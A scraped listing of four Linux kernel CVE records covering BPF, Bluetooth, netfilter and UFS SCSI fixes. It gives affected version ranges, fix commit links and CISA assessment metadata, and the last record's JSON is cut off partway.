	https://git.kernel.org/stable/c/7e5471b5efebc30dd…
	https://git.kernel.org/stable/c/ff941a8449e712eaf…
	https://git.kernel.org/stable/c/009367099eb61a4fc…

Impacted products

Vendor

Product

Version

Linux

Affected: ee26dade0e3bcd8a34ae7520e373fb69365fce7a , < b694989bb13ed5f166e633faa1eb0f21c6d261a6 (git)
Affected: ee26dade0e3bcd8a34ae7520e373fb69365fce7a , < 3364c2ed1c241989847f19cf83e3db903ce689e3 (git)
Affected: ee26dade0e3bcd8a34ae7520e373fb69365fce7a , < a21d76bd0b0d39518e9a4c19f6cf7c042a974aff (git)
Affected: ee26dade0e3bcd8a34ae7520e373fb69365fce7a , < 7e5471b5efebc30dd0bc035cda86693a5c73d45f (git)
Affected: ee26dade0e3bcd8a34ae7520e373fb69365fce7a , < ff941a8449e712eaf7efca1a13bfb9afd3d99fc2 (git)
Affected: ee26dade0e3bcd8a34ae7520e373fb69365fce7a , < 009367099eb61a4fc2af44d4eb06b6b4de7de6db (git)

Linux

Affected: 5.5
Unaffected: 0 , < 5.5 (semver)
Unaffected: 5.10.222 , ≤ 5.10.* (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.98 , ≤ 6.1.* (semver)
Unaffected: 6.6.39 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:02:24.334Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b694989bb13ed5f166e633faa1eb0f21c6d261a6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3364c2ed1c241989847f19cf83e3db903ce689e3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a21d76bd0b0d39518e9a4c19f6cf7c042a974aff"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7e5471b5efebc30dd0bc035cda86693a5c73d45f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ff941a8449e712eaf7efca1a13bfb9afd3d99fc2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/009367099eb61a4fc2af44d4eb06b6b4de7de6db"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42161",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:14:52.496894Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:33.542Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "tools/lib/bpf/bpf_core_read.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "b694989bb13ed5f166e633faa1eb0f21c6d261a6",
              "status": "affected",
              "version": "ee26dade0e3bcd8a34ae7520e373fb69365fce7a",
              "versionType": "git"
            },
            {
              "lessThan": "3364c2ed1c241989847f19cf83e3db903ce689e3",
              "status": "affected",
              "version": "ee26dade0e3bcd8a34ae7520e373fb69365fce7a",
              "versionType": "git"
            },
            {
              "lessThan": "a21d76bd0b0d39518e9a4c19f6cf7c042a974aff",
              "status": "affected",
              "version": "ee26dade0e3bcd8a34ae7520e373fb69365fce7a",
              "versionType": "git"
            },
            {
              "lessThan": "7e5471b5efebc30dd0bc035cda86693a5c73d45f",
              "status": "affected",
              "version": "ee26dade0e3bcd8a34ae7520e373fb69365fce7a",
              "versionType": "git"
            },
            {
              "lessThan": "ff941a8449e712eaf7efca1a13bfb9afd3d99fc2",
              "status": "affected",
              "version": "ee26dade0e3bcd8a34ae7520e373fb69365fce7a",
              "versionType": "git"
            },
            {
              "lessThan": "009367099eb61a4fc2af44d4eb06b6b4de7de6db",
              "status": "affected",
              "version": "ee26dade0e3bcd8a34ae7520e373fb69365fce7a",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "tools/lib/bpf/bpf_core_read.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.5"
            },
            {
              "lessThan": "5.5",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.222",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.98",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.39",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.222",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.98",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.39",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Avoid uninitialized value in BPF_CORE_READ_BITFIELD\n\n[Changes from V1:\n - Use a default branch in the switch statement to initialize `val\u0027.]\n\nGCC warns that `val\u0027 may be used uninitialized in the\nBPF_CRE_READ_BITFIELD macro, defined in bpf_core_read.h as:\n\n\t[...]\n\tunsigned long long val;\t\t\t\t\t\t      \\\n\t[...]\t\t\t\t\t\t\t\t      \\\n\tswitch (__CORE_RELO(s, field, BYTE_SIZE)) {\t\t\t      \\\n\tcase 1: val = *(const unsigned char *)p; break;\t\t\t      \\\n\tcase 2: val = *(const unsigned short *)p; break;\t\t      \\\n\tcase 4: val = *(const unsigned int *)p; break;\t\t\t      \\\n\tcase 8: val = *(const unsigned long long *)p; break;\t\t      \\\n        }       \t\t\t\t\t\t\t      \\\n\t[...]\n\tval;\t\t\t\t\t\t\t\t      \\\n\t}\t\t\t\t\t\t\t\t      \\\n\nThis patch adds a default entry in the switch statement that sets\n`val\u0027 to zero in order to avoid the warning, and random values to be\nused in case __builtin_preserve_field_info returns unexpected values\nfor BPF_FIELD_BYTE_SIZE.\n\nTested in bpf-next master.\nNo regressions."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-06-19T12:56:37.768Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/b694989bb13ed5f166e633faa1eb0f21c6d261a6"
        },
        {
          "url": "https://git.kernel.org/stable/c/3364c2ed1c241989847f19cf83e3db903ce689e3"
        },
        {
          "url": "https://git.kernel.org/stable/c/a21d76bd0b0d39518e9a4c19f6cf7c042a974aff"
        },
        {
          "url": "https://git.kernel.org/stable/c/7e5471b5efebc30dd0bc035cda86693a5c73d45f"
        },
        {
          "url": "https://git.kernel.org/stable/c/ff941a8449e712eaf7efca1a13bfb9afd3d99fc2"
        },
        {
          "url": "https://git.kernel.org/stable/c/009367099eb61a4fc2af44d4eb06b6b4de7de6db"
        }
      ],
      "title": "bpf: Avoid uninitialized value in BPF_CORE_READ_BITFIELD",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42161",
    "datePublished": "2024-07-30T07:47:03.136Z",
    "dateReserved": "2024-07-29T15:50:41.196Z",
    "dateUpdated": "2025-11-03T22:02:24.334Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42133 (GCVE-0-2024-42133)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:46 – Updated: 2025-05-04 12:57

Title

Bluetooth: Ignore too large handle values in BIG

Summary

In the Linux kernel, the following vulnerability has been resolved: Bluetooth: Ignore too large handle values in BIG hci_le_big_sync_established_evt is necessary to filter out cases where the handle value is belonging to ida id range, otherwise ida will be erroneously released in hci_conn_cleanup.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/38263088b845abeee…
	https://git.kernel.org/stable/c/dad0003ccc68457ba…
	https://git.kernel.org/stable/c/015d79c96d62cd8a4…

Impacted products

Vendor

Product

Version

Linux

Affected: 84cb0143fb8a03bf941c7aaedd56c938c99dafad , < 38263088b845abeeeb98dda5b87c0de3063b6dbb (git)
Affected: 181a42edddf51d5d9697ecdf365d72ebeab5afb0 , < dad0003ccc68457baf005a6ed75b4d321463fe3d (git)
Affected: 181a42edddf51d5d9697ecdf365d72ebeab5afb0 , < 015d79c96d62cd8a4a359fcf5be40d58088c936b (git)
Affected: e9f708beada55426c8d678e2f46af659eb5bf4f0 (git)

Linux

Affected: 6.7
Unaffected: 0 , < 6.7 (semver)
Unaffected: 6.6.39 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:54:32.554Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/38263088b845abeeeb98dda5b87c0de3063b6dbb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dad0003ccc68457baf005a6ed75b4d321463fe3d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/015d79c96d62cd8a4a359fcf5be40d58088c936b"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42133",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:16:19.014130Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:36.283Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/bluetooth/hci_event.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "38263088b845abeeeb98dda5b87c0de3063b6dbb",
              "status": "affected",
              "version": "84cb0143fb8a03bf941c7aaedd56c938c99dafad",
              "versionType": "git"
            },
            {
              "lessThan": "dad0003ccc68457baf005a6ed75b4d321463fe3d",
              "status": "affected",
              "version": "181a42edddf51d5d9697ecdf365d72ebeab5afb0",
              "versionType": "git"
            },
            {
              "lessThan": "015d79c96d62cd8a4a359fcf5be40d58088c936b",
              "status": "affected",
              "version": "181a42edddf51d5d9697ecdf365d72ebeab5afb0",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "e9f708beada55426c8d678e2f46af659eb5bf4f0",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/bluetooth/hci_event.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.7"
            },
            {
              "lessThan": "6.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.39",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.39",
                  "versionStartIncluding": "6.6.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "6.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.5.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: Ignore too large handle values in BIG\n\nhci_le_big_sync_established_evt is necessary to filter out cases where the\nhandle value is belonging to ida id range, otherwise ida will be erroneously\nreleased in hci_conn_cleanup."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:57:43.780Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/38263088b845abeeeb98dda5b87c0de3063b6dbb"
        },
        {
          "url": "https://git.kernel.org/stable/c/dad0003ccc68457baf005a6ed75b4d321463fe3d"
        },
        {
          "url": "https://git.kernel.org/stable/c/015d79c96d62cd8a4a359fcf5be40d58088c936b"
        }
      ],
      "title": "Bluetooth: Ignore too large handle values in BIG",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42133",
    "datePublished": "2024-07-30T07:46:28.632Z",
    "dateReserved": "2024-07-29T15:50:41.186Z",
    "dateUpdated": "2025-05-04T12:57:43.780Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-42269 (GCVE-0-2024-42269)

Vulnerability from cvelistv5 – Published: 2024-08-17 08:54 – Updated: 2025-11-03 22:03

Title

netfilter: iptables: Fix potential null-ptr-deref in ip6table_nat_table_init().

Summary

In the Linux kernel, the following vulnerability has been resolved: netfilter: iptables: Fix potential null-ptr-deref in ip6table_nat_table_init(). ip6table_nat_table_init() accesses net->gen->ptr[ip6table_nat_net_ops.id], but the function is exposed to user space before the entry is allocated via register_pernet_subsys(). Let's call register_pernet_subsys() before xt_register_template().

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/419ee6274c5153b89…
	https://git.kernel.org/stable/c/91b6df6611b7edb28…
	https://git.kernel.org/stable/c/e85b9b6a87be4cb37…
	https://git.kernel.org/stable/c/87dba44e9471b79b2…
	https://git.kernel.org/stable/c/c22921df777de5606…

Impacted products

Vendor

Product

Version

Linux

Affected: fdacd57c79b79a03c7ca88f706ad9fb7b46831c1 , < 419ee6274c5153b89c4393c1946faa4c3cad4f9e (git)
Affected: fdacd57c79b79a03c7ca88f706ad9fb7b46831c1 , < 91b6df6611b7edb28676c4f63f90c56c30d3e601 (git)
Affected: fdacd57c79b79a03c7ca88f706ad9fb7b46831c1 , < e85b9b6a87be4cb3710082038b677e97f2389003 (git)
Affected: fdacd57c79b79a03c7ca88f706ad9fb7b46831c1 , < 87dba44e9471b79b255d0736858a897332db9226 (git)
Affected: fdacd57c79b79a03c7ca88f706ad9fb7b46831c1 , < c22921df777de5606f1047b1345b8d22ef1c0b34 (git)

Linux

Affected: 5.15
Unaffected: 0 , < 5.15 (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.104 , ≤ 6.1.* (semver)
Unaffected: 6.6.45 , ≤ 6.6.* (semver)
Unaffected: 6.10.4 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42269",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:12:17.928163Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:32.642Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:03:04.176Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/ipv6/netfilter/ip6table_nat.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "419ee6274c5153b89c4393c1946faa4c3cad4f9e",
              "status": "affected",
              "version": "fdacd57c79b79a03c7ca88f706ad9fb7b46831c1",
              "versionType": "git"
            },
            {
              "lessThan": "91b6df6611b7edb28676c4f63f90c56c30d3e601",
              "status": "affected",
              "version": "fdacd57c79b79a03c7ca88f706ad9fb7b46831c1",
              "versionType": "git"
            },
            {
              "lessThan": "e85b9b6a87be4cb3710082038b677e97f2389003",
              "status": "affected",
              "version": "fdacd57c79b79a03c7ca88f706ad9fb7b46831c1",
              "versionType": "git"
            },
            {
              "lessThan": "87dba44e9471b79b255d0736858a897332db9226",
              "status": "affected",
              "version": "fdacd57c79b79a03c7ca88f706ad9fb7b46831c1",
              "versionType": "git"
            },
            {
              "lessThan": "c22921df777de5606f1047b1345b8d22ef1c0b34",
              "status": "affected",
              "version": "fdacd57c79b79a03c7ca88f706ad9fb7b46831c1",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/ipv6/netfilter/ip6table_nat.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.15"
            },
            {
              "lessThan": "5.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.104",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.45",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.4",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.104",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.45",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.4",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: iptables: Fix potential null-ptr-deref in ip6table_nat_table_init().\n\nip6table_nat_table_init() accesses net-\u003egen-\u003eptr[ip6table_nat_net_ops.id],\nbut the function is exposed to user space before the entry is allocated\nvia register_pernet_subsys().\n\nLet\u0027s call register_pernet_subsys() before xt_register_template()."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:25:35.382Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/419ee6274c5153b89c4393c1946faa4c3cad4f9e"
        },
        {
          "url": "https://git.kernel.org/stable/c/91b6df6611b7edb28676c4f63f90c56c30d3e601"
        },
        {
          "url": "https://git.kernel.org/stable/c/e85b9b6a87be4cb3710082038b677e97f2389003"
        },
        {
          "url": "https://git.kernel.org/stable/c/87dba44e9471b79b255d0736858a897332db9226"
        },
        {
          "url": "https://git.kernel.org/stable/c/c22921df777de5606f1047b1345b8d22ef1c0b34"
        }
      ],
      "title": "netfilter: iptables: Fix potential null-ptr-deref in ip6table_nat_table_init().",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42269",
    "datePublished": "2024-08-17T08:54:24.267Z",
    "dateReserved": "2024-07-30T07:40:12.260Z",
    "dateUpdated": "2025-11-03T22:03:04.176Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2021-47188 (GCVE-0-2021-47188)

Vulnerability from cvelistv5 – Published: 2024-04-10 18:56 – Updated: 2025-05-04 07:06

Title

scsi: ufs: core: Improve SCSI abort handling

Summary

In the Linux kernel, the following vulnerability has been resolved: scsi: ufs: core: Improve SCSI abort handling The following has been observed on a test setup: WARNING: CPU: 4 PID: 250 at drivers/scsi/ufs/ufshcd.c:2737 ufshcd_queuecommand+0x468/0x65c Call trace: ufshcd_queuecommand+0x468/0x65c scsi_send_eh_cmnd+0x224/0x6a0 scsi_eh_test_devices+0x248/0x418 scsi_eh_ready_devs+0xc34/0xe58 scsi_error_handler+0x204/0x80c kthread+0x150/0x1b4 ret_from_fork+0x10/0x30 That warning is triggered by the following statement: WARN_ON(lrbp->cmd); Fix this warning by clearing lrbp->cmd from the abort handler.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/c36baca06efa833ad…
	https://git.kernel.org/stable/c/3ff1f6b6ba6f97f50…

Impacted products

Vendor

Product

Version

Linux

Affected: 7a3e97b0dc4bbac2ba7803564ab0057722689921 , < c36baca06efa833adaefba61f45fefdc49b6d070 (git)
Affected: 7a3e97b0dc4bbac2ba7803564ab0057722689921 , < 3ff1f6b6ba6f97f50862aa50e79959cc8ddc2566 (git)

Linux

Affected: 3.4
Unaffected: 0 , < 3.4 (semver)
Unaffected: 5.15.5 , ≤ 5.15.* (semver)
Unaffected: 5.16 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T05:32:07.411Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c36baca06efa833adaefba61f45fefdc49b6d070"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3ff1f6b6ba6f97f50862aa50e79959cc8ddc2566"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2021-47188",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:50:11.298126Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:39.156Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/scsi/ufs/ufshcd.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "c36baca06efa833adaefba61f45fefdc49b6d070",
              "status": "affected",
              "version": "7a3e97b0dc4bbac2ba7803564ab0057722689921",
              "versionType": "git"
            },
            {
              "lessThan": "3ff1f6b6ba6f97f50862aa50e79959cc8ddc2566",
              "status": "affected",
              "version": "7a3e97b0dc4bbac2ba7803564ab0057722689921",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/scsi/ufs/ufshcd.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.4"
            },
            {
              "lessThan": "3.4",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "5.16",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.5",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.16",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
